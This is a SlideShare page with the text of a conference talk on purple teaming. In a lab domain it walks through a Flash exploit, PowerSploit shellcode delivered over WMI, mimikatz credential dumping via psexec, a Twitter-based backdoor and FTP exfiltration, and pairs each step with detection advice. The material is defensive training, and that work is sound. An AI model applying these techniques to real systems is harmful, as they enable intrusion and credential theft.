SlideShare a Scribd company logo

Purple View

Haydn Johnson
Haydn Johnson

The recent trend of using Attack and Defense Together. Due to the recent trend of using offensive and defensive capabilities together, we thought a talk on Purple Teaming would be interesting. We hope to benefit those on the Attack side (red team), Defensive (blue team) and mixing the two.

Technology
1 of 100
Download to read offline
Purple View The recent trend of using Attack and Defense Together Not OUR idea - backed by many @raffertylaura | @haydnjohnson
Quick who are we Haydn Johnson @haydnjohnson OSCP Offensive/Attack Interest Enjoys presenting Laura @raffertylaura MSc Computer Science (Security/Privacy) Interested in both sides of security Loooooves presenting @raffertylaura | @haydnjohnson
Contents 1. Basic Term Definition 2. Introduction to Red, Blue and Purple 3. Run through of an Attack ○ Gaining Access ○ Lateral Movement ○ Domain Admin ○ Maintaining Access ○ Data Exfiltration 4. For each attack: ○ Attacking View ○ Defenders View ○ Possible Purple Team exercises @raffertylaura | @haydnjohnson
Definitions Exploit - The thing used to gain unauthorized access to a system Payload - What is done after the access is gained (shell, command) Metasploit - An open source exploit framework, modular Meterpreter - an advanced, extensible payload that uses in-memory DLL injection Shell - Gaining Terminal/CMD access remotely https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/ http://www.metasploit.com/
Red Team - Penetration | Offensive ● Scans ● Exploits ● Logic abuse ● Access to things they shouldn’t @raffertylaura | @haydnjohnson
Blue Team - Block, Prevent, Detect | Defensive ● Logs ● Emails ● Events ● Triggers ● Networking ● More Logs @raffertylaura | @haydnjohnson
Red Team - Goals ● Model recent threats and trends ● Longer term ● Highlight Gaps in Security Controls, detection etc ● Escape and Evade for Persistence @raffertylaura | @haydnjohnson
Blue Team - Goals ● Detect Attack ● Respond and Recover ● Produce Actionable Intelligence ● Identify Gaps and investment needs @raffertylaura | @haydnjohnson
Purple Team - Offensive & Defensive Working together to achieve the ultimate goal of making the organization more secure ● Exposes blue team to different threats & attacker mindset ● Test incident detection and response ● Allows red team to sharpen skills ● Policy and procedures tested ● Tuning of controls @raffertylaura | @haydnjohnson
Purple Team - Offensive & Defensive Different types of Purple Teaming ● Read Team Sitting with Network Defense team ● Adversary Simulation ● Traffic Generation ● cobaltstrike.com ● Wargaming Requires total picture involving all areas of the organization @raffertylaura | @haydnjohnson
Purple Team - The difference ● Using Security Posture and Weaknesses to find what is most valuable ● Goal Oriented ● Review attack ● Test how teams use services and how they are managed @raffertylaura | @haydnjohnson
Purple Team - The difference ● Time to Domain Admin ● Time to Data/Objective ● Time to Respond ● Time to Recover ● Identify where there needs to be more investment ● Measure Impact Done right, the blue team should come out with better monitoring and response plans. @raffertylaura | @haydnjohnson
Purple Team - The difference ● Set up a fake scenario - Assume Breach ● How will the attacker gain access? ● Why have they attacked, what do they want? ● How did they move through the network? ● If they exfiltrated data, how? Do not turn off servers, block IP addresses, make it realistic @raffertylaura | @haydnjohnson
Purple Team - Exercise “In the beginning, it’s easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary.” - Raphael Mudge http://blog.cobaltstrike.com/2014/11/12/adversary-simulation-becomes-a-thing/ @raffertylaura | @haydnjohnson
Purple Team - DEMO (step by step) Our exercise @raffertylaura | @haydnjohnson
Purple Team - Demo Architecture @raffertylaura | @haydnjohnson Domain: corp.test.com
Tools Used Red Team: ● Kali Linux ● Metasploit ● Meterpreter ● PowerSploit ● Twittor Blue Team: ● Wireshark ● Windows Event Logs @raffertylaura | @haydnjohnson
Setting up Windows GP @raffertylaura | @haydnjohnson
Gaining Access Hacking Team Flash Exploit @raffertylaura | @haydnjohnson
Flash Exploits @raffertylaura | @haydnjohnson ● Flash plugins are vulnerable ○ You can embed a javascript/binary within a Flash file ○ ActionScript to define events to redirect to landing page ● Most exploit kit landing pages redirect to pages containing Flash exploits ○ Angler ○ Nuclear ○ Fiesta ● Installed by default on browser ● New vulnerabilities are identified on almost a weekly basis
Gaining Access @raffertylaura | @haydnjohnson Flash 18.0.0.194
A: Flash Exploit from SecurityFocus Hacking Team Flash Exploit: http://downloads.securityfocus.com/vulnerabilities/exploits/75568.rb
A: Start Flash Exploit from Kali @raffertylaura | @haydnjohnson
A: Start Flash Exploit from Kali @raffertylaura | @haydnjohnson
Client1 User navigates to malicious site which redirects to the exploit A: Redirect Victim @raffertylaura | @haydnjohnson
A: Client1 is exploited @raffertylaura | @haydnjohnson
A: A session is now established with Client1 We can now run Meterpreter @raffertylaura | @haydnjohnson
B: Wireshark: Landing Page and Redirect @raffertylaura | @haydnjohnson
B: Wireshark: Shell @raffertylaura | @haydnjohnson
B: What can you take away Security Onion, implement it, free Has snort rules for Flash exploits (need to install) Confirm if flash is needed for business reasons Keep flash updated 2811962 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 SSL Cert (trojan.rules) 2811963 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 CnC Beacon (trojan.rules) @raffertylaura | @haydnjohnson https://www.security-database.com/detail.php?alert=CVE-2015-5119 https://security-onion-solutions.github.io/security-onion/
Purple Team - Exercise ● Blue team understands how attackers can gain initial access ● Flash exploits - ongoing issue ● Helps blue team to identify suspicious traffic and what is happening from the attacker perspective ● Red team sees how attacks are visible by blue team and think of ways to make it more stealthy @raffertylaura | @haydnjohnson
Privilege Escalation Not Shown @raffertylaura | @haydnjohnson
Privilege Escalation ● We are skipping privilege escalation from Domain User to Local Admin @raffertylaura | @haydnjohnson
Lateral Movement PowerSploit @raffertylaura | @haydnjohnson
A: PowerSploit Available on Github Open Source https://github.com/mattifestation/PowerSploit @raffertylaura | @haydnjohnson
A: PowerSploit More than 1 script! PowerShell Modules @raffertylaura | @haydnjohnson
PowerView Part of PowerShell Empire Very advanced https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView @raffertylaura | @haydnjohnson
A: Lateral Movement The same local Administrator account passwords on multiple computers. by Sean Metcalf https://adsecurity.org/?p=1684 @raffertylaura | @haydnjohnson
Same Passwords for All Local Admins
A: Lateral Movement @raffertylaura | @haydnjohnson
A: Lateral Movement Powersploit Remote Powershell Using Invoke--Shellcode.ps1 @raffertylaura | @haydnjohnson
A: Base64 Encoding Payload Remove issues with whitespace The Hacker Playbook 1 (now 2) @raffertylaura | @haydnjohnson http://thehackerplaybook.com/dashboard/
A: Hosting Powersploit Invoke--Shellcode.ps1 PowerSploit code hosted on local Kali machine @raffertylaura | @haydnjohnson
A: Invoke-WmiMethod Use powershell to connect remotely, create a new process and launch the IEX cradle. Calls Windows Management Instrumentation (WMI) methods. The Win32_Process WMI class allows creation of a process. @raffertylaura | @haydnjohnson
A: Execute Remote command Execute command from Client1 to tell Client2 to download and execute shellcode @raffertylaura | @haydnjohnson
A: Client1 gives same password Same password across multiple clients @raffertylaura | @haydnjohnson
A: Receive Shell @raffertylaura | @haydnjohnson
B: WireShark traffic TCP Hand Shake Bind Requests @raffertylaura | @haydnjohnson
B: Client1 requests remote instance on Client2 @raffertylaura | @haydnjohnson
B: Client2 eventually asks where is Kali @raffertylaura | @haydnjohnson
B: Client2 downloads Invoke--Shellcode.ps1 @raffertylaura | @haydnjohnson
B: Client1 logs into Client2 @raffertylaura | @haydnjohnson
B: PowerShell Process Created @raffertylaura | @haydnjohnson
B: PowerShell connects to Kali Client2 reaches out to Kali on port 80 @raffertylaura | @haydnjohnson
B: What can you take away Event Correlation - based on event ID, source and destination for remote connections Implement alerting based on Security Events together SIEM can/SHOULD do this Use Log MD - really great logging tool, especially for powershell @raffertylaura | @haydnjohnson http://brakeingsecurity.com/2015-042-log_md-more-malware-archaeology-and-sifting- through-the-junk http://malwarearchaeology.squarespace.com/log-md/
Purple Team - Benefits ● Identify ways to move around the network ● Identify and confirm Defensive Controls in Place ● Identify what worked, what did not ● Implement changes ● Justification for resources @raffertylaura | @haydnjohnson
Privilege Escalation Local Admin to Domain Admin @raffertylaura | @haydnjohnson
A: Local Admin to Domain Admin @raffertylaura | @haydnjohnson ● Why escalate privileges from Local Admin to Domain Admin? ● Domain admin - control over active directory! ● Access IT resources ● Create accounts ● Propagate malware
A: Local Admin to Domain Admin @raffertylaura | @haydnjohnson
A: Local Admin to Domain Admin From Client1, map the admin$ share on Client2 and copy over sekurlsa.dll @raffertylaura | @haydnjohnson
A: Local Admin to Domain Admin Use psexec to run mimikatz.exe on Client2 @raffertylaura | @haydnjohnson
A: Local Admin to Domain Admin Use sekurlsa::logonpasswords to dump the Domain Admin logon credentials from Client2! @raffertylaura | @haydnjohnson
B: Wireshark: @raffertylaura | @haydnjohnson
B: Event Logs Client1 logs into Client2 local admin
B: Event Logs Client1 runs mimikatz on Client2 @raffertylaura | @haydnjohnson
B: Event Logs Sensitive privilege use from Client1 to Client2
B: What can you take away ● Prevention: ○ Access control for shared drive ○ Limit access to psexec and monitor use ○ Active Directory best practices ● Detection: ○ IDS signatures ○ SIEM use case - Event correlation between system logs and network proxy logs ○ For lateral movement: enable file level auditing ○ Canary accounts
Purple Team - Benefits ● Blue team observes vulnerabilities/threats which may not have been considered ○ Learns how attacker could escalate privileges from local admin to domain admin ● Red team observes the footprint left behind from this attack and possibly how to minimize it ○ Can identify potential weaknesses in blue team monitoring/response processes ○ Provide more thorough recommendations @raffertylaura | @haydnjohnson
Twittor Backdoor using Twitter @raffertylaura | @haydnjohnson
A: Twittor ● Easy to install ● Easy to Use ● Easy to add Shellcode https://github.com/PaulSec/twittor @raffertylaura | @haydnjohnson
A: Twittor - insides Simple Subprocess execution Stored as base64 encoded message
A: Pyinstaller On Github Turn Python file into EXE @raffertylaura | @haydnjohnsonhttps://github.com/pyinstaller/pyinstaller
A: Pyinstaller Python File becomes Executable @raffertylaura | @haydnjohnson
@raffertylaura | @haydnjohnson Twittor: Backdoor Using Twitter
A: Twittor Python file used as C2 Server Python file used as backdoor EXE - Pyinstaller @raffertylaura | @haydnjohnson
A: Twittor - Retrieving command Send Command to execute Retrieve command @raffertylaura | @haydnjohnson
B: Twittor - Network Traffic Reaching out to API Normal User Traffic?? @raffertylaura | @haydnjohnson
B: Twittor - Client system Backdoor as Python Executable compiled with --no-console flag to hide output @raffertylaura | @haydnjohnson
B: Traffic from Client Reaches out to twitter Src and Destination are internal IPs, sends to API @raffertylaura | @haydnjohnson
B: What can you take away Check if there are any remote connections after hours, is it against policy? Again, Correlate logs with known C2 addresses See if AV picks it up @raffertylaura | @haydnjohnson
Purple Team - Benefits Test if a C2 can reach out to twitter. Social Media may be blocked via the browser, but some sites can still be accessed via API etc. If it is not blocked, why not, can your blue team help to stop this and others. @raffertylaura | @haydnjohnson
Data Exfiltration Clear Text FTP @raffertylaura | @haydnjohnson
@raffertylaura | @haydnjohnson A: Data Exfiltration Through Clear Text FTP
A: FTP Extraction Finding Data to extract @raffertylaura | @haydnjohnson
A: Finding data Important data identified @raffertylaura | @haydnjohnson
A: Downloading data @raffertylaura | @haydnjohnson
A: Data Transferred @raffertylaura | @haydnjohnson
B: Meterpreter connection DLL injection Lots of chatter @raffertylaura | @haydnjohnson
B: FTP connection Clear Text @raffertylaura | @haydnjohnson
B: Successful Transfer @raffertylaura | @haydnjohnson
B: What can you take away? @raffertylaura | @haydnjohnson Disable FTP - should not have a business need for it really If there is a business need whitelist those IP addresses | Create a group of users specifically for FTP
Purple Team - Exercise Clear Text Will any alarms trigger? Understand potential holes in alerting Measure time to detect and respond @raffertylaura | @haydnjohnson
Conclusion Purple Teaming is Good @raffertylaura | @haydnjohnson
Purple Team - Reiteration Provides more value than a Penetration Test Should be implemented into a regular schedule Helps train security personnel Helps make sure your boxes are tuned @raffertylaura | @haydnjohnson
Limitations and Future Work ● So far we have limited detection tools to Windows Server event logs and Wireshark, (and a bit of Snort) ● Could be extended for enterprise security tools such as SIEM/IDS ● Powershell/WMI for blue team ● More advanced attacks, persistence using Powershell Empire @raffertylaura | @haydnjohnson
Obligatory Cute Kat Picture
References are in following slides @raffertylaura | @haydnjohnson
Microsoft - 8 minute Video https://azure.microsoft.com/en-us/documentation/videos/red-vs-blue-internal-security-penetration-testing-of-microsoft-azure/ @raffertylaura | @haydnjohnson
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013 http://www.slideshare.net/beltface/hybrid-talk @raffertylaura | @haydnjohnson
A: Downloads PowerShell file Client2 reaches out to Kali machine @raffertylaura | @haydnjohnson

Recommended

Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest Haydn Johnson
 
Empire Work shop
Empire Work shopEmpire Work shop
Empire Work shopHaydn Johnson
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Chris Gates
 
Power your way to becoming a red team cyber security expert
Power your way to becoming a red team cyber security expertPower your way to becoming a red team cyber security expert
Power your way to becoming a red team cyber security expertShivamSharma909
 
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013beltface
 
Bsides to 2016-penetration-testing
Bsides to 2016-penetration-testingBsides to 2016-penetration-testing
Bsides to 2016-penetration-testingHaydn Johnson
 
Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Chris Gates
 
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Chris Gates
 

Recommended

Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest Haydn Johnson
 
Empire Work shop
Empire Work shopEmpire Work shop
Empire Work shopHaydn Johnson
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Chris Gates
 
Power your way to becoming a red team cyber security expert
Power your way to becoming a red team cyber security expertPower your way to becoming a red team cyber security expert
Power your way to becoming a red team cyber security expertShivamSharma909
 
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013beltface
 
Bsides to 2016-penetration-testing
Bsides to 2016-penetration-testingBsides to 2016-penetration-testing
Bsides to 2016-penetration-testingHaydn Johnson
 
Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Chris Gates
 
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Chris Gates
 
Purple View
Purple ViewPurple View
Purple ViewHaydn Johnson
 
MITRE ATT&CKcon 2018: Building an Atomic Testing Program, Brian Beyer, Red Ca...
MITRE ATT&CKcon 2018: Building an Atomic Testing Program, Brian Beyer, Red Ca...MITRE ATT&CKcon 2018: Building an Atomic Testing Program, Brian Beyer, Red Ca...
MITRE ATT&CKcon 2018: Building an Atomic Testing Program, Brian Beyer, Red Ca...MITRE - ATT&CKcon
 
Continuous Security: 5 Ways DevOps Improves Security
Continuous Security: 5 Ways DevOps Improves SecurityContinuous Security: 5 Ways DevOps Improves Security
Continuous Security: 5 Ways DevOps Improves SecuritySonatype
 
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSecDevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSecSonatype
 
5 Tips to Successfully Running a Bug Bounty Program
5 Tips to Successfully Running a Bug Bounty Program5 Tips to Successfully Running a Bug Bounty Program
5 Tips to Successfully Running a Bug Bounty Programbugcrowd
 
Bug bounty programs
Bug bounty programsBug bounty programs
Bug bounty programsDan Vasile
 
Purple team is awesome
Purple team is awesomePurple team is awesome
Purple team is awesomeSumedt Jitpukdebodin
 
FRSecure 2018 CISSP Mentor Program Session 10
FRSecure 2018 CISSP Mentor Program Session 10FRSecure 2018 CISSP Mentor Program Session 10
FRSecure 2018 CISSP Mentor Program Session 10FRSecure
 
Applying principles of chaos engineering to serverless (O'Reilly Software Arc...
Applying principles of chaos engineering to serverless (O'Reilly Software Arc...Applying principles of chaos engineering to serverless (O'Reilly Software Arc...
Applying principles of chaos engineering to serverless (O'Reilly Software Arc...Yan Cui
 
Resistance Isn't Futile: A Practical Approach to Threat Modeling
Resistance Isn't Futile: A Practical Approach to Threat ModelingResistance Isn't Futile: A Practical Approach to Threat Modeling
Resistance Isn't Futile: A Practical Approach to Threat ModelingKatie Nickels
 
Logging for Hackers v1.0
Logging for Hackers v1.0Logging for Hackers v1.0
Logging for Hackers v1.0Michael Gough
 
More Aim, Less Blame: How to use postmortems to turn failures into something ...
More Aim, Less Blame: How to use postmortems to turn failures into something ...More Aim, Less Blame: How to use postmortems to turn failures into something ...
More Aim, Less Blame: How to use postmortems to turn failures into something ...Daniel Kanchev
 
BSides LA/PDX
BSides LA/PDXBSides LA/PDX
BSides LA/PDXleifdreizler
 
2018 FRSecure CISSP Mentor Program Session 8
2018 FRSecure CISSP Mentor Program Session 82018 FRSecure CISSP Mentor Program Session 8
2018 FRSecure CISSP Mentor Program Session 8FRSecure
 
Secrets and Mysteries of Automated Execution Keynote slides
Secrets and Mysteries of Automated Execution Keynote slidesSecrets and Mysteries of Automated Execution Keynote slides
Secrets and Mysteries of Automated Execution Keynote slidesAlan Richardson
 
Applying principles of chaos engineering to serverless (CodeMesh)
Applying principles of chaos engineering to serverless (CodeMesh)Applying principles of chaos engineering to serverless (CodeMesh)
Applying principles of chaos engineering to serverless (CodeMesh)Yan Cui
 
So you want to be a red teamer
So you want to be a red teamerSo you want to be a red teamer
So you want to be a red teamerJorge Orchilles
 
A Journey Into Pen-tester land: Myths or Facts!
A Journey Into Pen-tester land: Myths or Facts!A Journey Into Pen-tester land: Myths or Facts!
A Journey Into Pen-tester land: Myths or Facts!Ammar WK
 
FUEL_USERS_GROUP
FUEL_USERS_GROUPFUEL_USERS_GROUP
FUEL_USERS_GROUPWill Pearce
 
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team EngagementUsing IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team EngagementJoe Vest
 
Purple teaming Cyber Kill Chain
Purple teaming Cyber Kill ChainPurple teaming Cyber Kill Chain
Purple teaming Cyber Kill ChainHaydn Johnson
 
Automation of Penetration Testing
Automation of Penetration TestingAutomation of Penetration Testing
Automation of Penetration TestingHaydn Johnson
 

More Related Content

What's hot

MITRE ATT&CKcon 2018: Building an Atomic Testing Program, Brian Beyer, Red Ca...
MITRE ATT&CKcon 2018: Building an Atomic Testing Program, Brian Beyer, Red Ca...MITRE ATT&CKcon 2018: Building an Atomic Testing Program, Brian Beyer, Red Ca...
MITRE ATT&CKcon 2018: Building an Atomic Testing Program, Brian Beyer, Red Ca...MITRE - ATT&CKcon
 
Continuous Security: 5 Ways DevOps Improves Security
Continuous Security: 5 Ways DevOps Improves SecurityContinuous Security: 5 Ways DevOps Improves Security
Continuous Security: 5 Ways DevOps Improves SecuritySonatype
 
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSecDevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSecSonatype
 
5 Tips to Successfully Running a Bug Bounty Program
5 Tips to Successfully Running a Bug Bounty Program5 Tips to Successfully Running a Bug Bounty Program
5 Tips to Successfully Running a Bug Bounty Programbugcrowd
 
Bug bounty programs
Bug bounty programsBug bounty programs
Bug bounty programsDan Vasile
 
FRSecure 2018 CISSP Mentor Program Session 10
FRSecure 2018 CISSP Mentor Program Session 10FRSecure 2018 CISSP Mentor Program Session 10
FRSecure 2018 CISSP Mentor Program Session 10FRSecure
 
Applying principles of chaos engineering to serverless (O'Reilly Software Arc...
Applying principles of chaos engineering to serverless (O'Reilly Software Arc...Applying principles of chaos engineering to serverless (O'Reilly Software Arc...
Applying principles of chaos engineering to serverless (O'Reilly Software Arc...Yan Cui
 
Resistance Isn't Futile: A Practical Approach to Threat Modeling
Resistance Isn't Futile: A Practical Approach to Threat ModelingResistance Isn't Futile: A Practical Approach to Threat Modeling
Resistance Isn't Futile: A Practical Approach to Threat ModelingKatie Nickels
 
Logging for Hackers v1.0
Logging for Hackers v1.0Logging for Hackers v1.0
Logging for Hackers v1.0Michael Gough
 
More Aim, Less Blame: How to use postmortems to turn failures into something ...
More Aim, Less Blame: How to use postmortems to turn failures into something ...More Aim, Less Blame: How to use postmortems to turn failures into something ...
More Aim, Less Blame: How to use postmortems to turn failures into something ...Daniel Kanchev
 
2018 FRSecure CISSP Mentor Program Session 8
2018 FRSecure CISSP Mentor Program Session 82018 FRSecure CISSP Mentor Program Session 8
2018 FRSecure CISSP Mentor Program Session 8FRSecure
 
Secrets and Mysteries of Automated Execution Keynote slides
Secrets and Mysteries of Automated Execution Keynote slidesSecrets and Mysteries of Automated Execution Keynote slides
Secrets and Mysteries of Automated Execution Keynote slidesAlan Richardson
 
Applying principles of chaos engineering to serverless (CodeMesh)
Applying principles of chaos engineering to serverless (CodeMesh)Applying principles of chaos engineering to serverless (CodeMesh)
Applying principles of chaos engineering to serverless (CodeMesh)Yan Cui
 
So you want to be a red teamer
So you want to be a red teamerSo you want to be a red teamer
So you want to be a red teamerJorge Orchilles
 
A Journey Into Pen-tester land: Myths or Facts!
A Journey Into Pen-tester land: Myths or Facts!A Journey Into Pen-tester land: Myths or Facts!
A Journey Into Pen-tester land: Myths or Facts!Ammar WK
 
FUEL_USERS_GROUP
FUEL_USERS_GROUPFUEL_USERS_GROUP
FUEL_USERS_GROUPWill Pearce
 
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team EngagementUsing IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team EngagementJoe Vest
 

What's hot (20)

Purple View
Purple ViewPurple View
Purple View
 
MITRE ATT&CKcon 2018: Building an Atomic Testing Program, Brian Beyer, Red Ca...
MITRE ATT&CKcon 2018: Building an Atomic Testing Program, Brian Beyer, Red Ca...MITRE ATT&CKcon 2018: Building an Atomic Testing Program, Brian Beyer, Red Ca...
MITRE ATT&CKcon 2018: Building an Atomic Testing Program, Brian Beyer, Red Ca...
 
Continuous Security: 5 Ways DevOps Improves Security
Continuous Security: 5 Ways DevOps Improves SecurityContinuous Security: 5 Ways DevOps Improves Security
Continuous Security: 5 Ways DevOps Improves Security
 
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSecDevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
 
5 Tips to Successfully Running a Bug Bounty Program
5 Tips to Successfully Running a Bug Bounty Program5 Tips to Successfully Running a Bug Bounty Program
5 Tips to Successfully Running a Bug Bounty Program
 
Bug bounty programs
Bug bounty programsBug bounty programs
Bug bounty programs
 
Purple team is awesome
Purple team is awesomePurple team is awesome
Purple team is awesome
 
FRSecure 2018 CISSP Mentor Program Session 10
FRSecure 2018 CISSP Mentor Program Session 10FRSecure 2018 CISSP Mentor Program Session 10
FRSecure 2018 CISSP Mentor Program Session 10
 
Applying principles of chaos engineering to serverless (O'Reilly Software Arc...
Applying principles of chaos engineering to serverless (O'Reilly Software Arc...Applying principles of chaos engineering to serverless (O'Reilly Software Arc...
Applying principles of chaos engineering to serverless (O'Reilly Software Arc...
 
Resistance Isn't Futile: A Practical Approach to Threat Modeling
Resistance Isn't Futile: A Practical Approach to Threat ModelingResistance Isn't Futile: A Practical Approach to Threat Modeling
Resistance Isn't Futile: A Practical Approach to Threat Modeling
 
Logging for Hackers v1.0
Logging for Hackers v1.0Logging for Hackers v1.0
Logging for Hackers v1.0
 
More Aim, Less Blame: How to use postmortems to turn failures into something ...
More Aim, Less Blame: How to use postmortems to turn failures into something ...More Aim, Less Blame: How to use postmortems to turn failures into something ...
More Aim, Less Blame: How to use postmortems to turn failures into something ...
 
BSides LA/PDX
BSides LA/PDXBSides LA/PDX
BSides LA/PDX
 
2018 FRSecure CISSP Mentor Program Session 8
2018 FRSecure CISSP Mentor Program Session 82018 FRSecure CISSP Mentor Program Session 8
2018 FRSecure CISSP Mentor Program Session 8
 
Secrets and Mysteries of Automated Execution Keynote slides
Secrets and Mysteries of Automated Execution Keynote slidesSecrets and Mysteries of Automated Execution Keynote slides
Secrets and Mysteries of Automated Execution Keynote slides
 
Applying principles of chaos engineering to serverless (CodeMesh)
Applying principles of chaos engineering to serverless (CodeMesh)Applying principles of chaos engineering to serverless (CodeMesh)
Applying principles of chaos engineering to serverless (CodeMesh)
 
So you want to be a red teamer
So you want to be a red teamerSo you want to be a red teamer
So you want to be a red teamer
 
A Journey Into Pen-tester land: Myths or Facts!
A Journey Into Pen-tester land: Myths or Facts!A Journey Into Pen-tester land: Myths or Facts!
A Journey Into Pen-tester land: Myths or Facts!
 
FUEL_USERS_GROUP
FUEL_USERS_GROUPFUEL_USERS_GROUP
FUEL_USERS_GROUP
 
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team EngagementUsing IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
 

Viewers also liked

Purple teaming Cyber Kill Chain
Purple teaming Cyber Kill ChainPurple teaming Cyber Kill Chain
Purple teaming Cyber Kill ChainHaydn Johnson
 
Automation of Penetration Testing
Automation of Penetration TestingAutomation of Penetration Testing
Automation of Penetration TestingHaydn Johnson
 
Security by Collaboration: Rethinking Red Teams versus Blue Teams
Security by Collaboration: Rethinking Red Teams versus Blue TeamsSecurity by Collaboration: Rethinking Red Teams versus Blue Teams
Security by Collaboration: Rethinking Red Teams versus Blue TeamsAlienVault
 
ProsVJoes - Task 2016
ProsVJoes - Task 2016ProsVJoes - Task 2016
ProsVJoes - Task 2016Haydn Johnson
 
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...Denim Group
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionBeau Bullock
 
Next generation pentest your company cannot buy
Next generation pentest your company cannot buyNext generation pentest your company cannot buy
Next generation pentest your company cannot buyVlad Styran
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guysNick Landers
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beau Bullock
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Chris Gates
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsChris Gates
 

Viewers also liked (13)

Purple teaming Cyber Kill Chain
Purple teaming Cyber Kill ChainPurple teaming Cyber Kill Chain
Purple teaming Cyber Kill Chain
 
Automation of Penetration Testing
Automation of Penetration TestingAutomation of Penetration Testing
Automation of Penetration Testing
 
Security by Collaboration: Rethinking Red Teams versus Blue Teams
Security by Collaboration: Rethinking Red Teams versus Blue TeamsSecurity by Collaboration: Rethinking Red Teams versus Blue Teams
Security by Collaboration: Rethinking Red Teams versus Blue Teams
 
ProsVJoes - Task 2016
ProsVJoes - Task 2016ProsVJoes - Task 2016
ProsVJoes - Task 2016
 
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
 
